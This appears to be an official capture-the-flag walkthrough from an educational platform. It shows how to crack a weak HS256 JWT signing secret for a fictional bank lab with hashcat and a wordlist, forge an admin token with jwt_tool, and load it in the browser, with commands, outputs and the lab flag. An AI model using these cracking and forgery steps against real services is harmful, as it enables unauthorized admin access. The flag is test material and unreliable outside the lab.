HACKR.GG
hackr.gg — Session Token — FirstBank Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Session Token — FirstBank

JWT Attacks · Weak JWT Secret / Token Forgery
Difficulty
Intermediate
Vuln class
Weak JWT Secret / Token Forgery
Steps
5
// Objective
Crack the weak secret used to sign FirstBank's JWTs, then forge a new token with admin privileges to access the admin panel and retrieve the flag.
// Tools required
hashcatjwt_toolBrowserDeveloper Tools
// Step-by-step walkthrough
1
Extract your JWT
Log in to FirstBank. Open DevTools → Application → Local Storage (or Cookies). Find the session token — it will be a JWT: three base64-encoded segments separated by dots.
Command / Input
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJ1c2VyIn0.xK2l...
You can decode the header and payload without the secret — they are just base64. Only the signature requires the secret to verify or forge.
2
Decode the payload
Decode the middle segment to see the claims inside your token.
Command / Input
echo "eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJ1c2VyIn0=" | base64 -d
Output
{"userId":"20001","role":"user"}
Your goal is to change "role":"user" to "role":"admin" and sign the modified token with the cracked secret.
3
Crack the signing secret with hashcat
JWTs signed with HS256 can be cracked if the secret is weak. Run hashcat against the full token using a common wordlist.
Command / Input
hashcat -a 0 -m 16500 \ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJ1c2VyIn0.xK2l... \ /usr/share/wordlists/rockyou.txt
Output
eyJhbG...xK2l...:bankSecret2024 Status: Cracked
The secret "bankSecret2024" was in the rockyou wordlist. A proper secret should be 32+ random bytes.
4
Forge an admin token
Use jwt_tool to create a new token with role:admin, signed with the cracked secret.
Command / Input
python3 jwt_tool.py <original_token> -T -S hs256 -p "bankSecret2024"
Output
Modified claim: role → admin New token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiIyMDAwMSIsInJvbGUiOiJhZG1pbiJ9.abc...
5
Use the forged token
Replace your session token in DevTools with the forged one. Reload the page and navigate to /admin.
Command / Input
localStorage.setItem("token", "<forged_token>")
Output
Admin panel unlocked. Flag: HackrGG{f1rstb4nk_jwt_f0rg3d_4dm1n}
// Flag
Flag value
HackrGG{f1rstb4nk_jwt_f0rg3d_4dm1n}
Displayed in the FirstBank admin panel after accessing it with a forged JWT.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute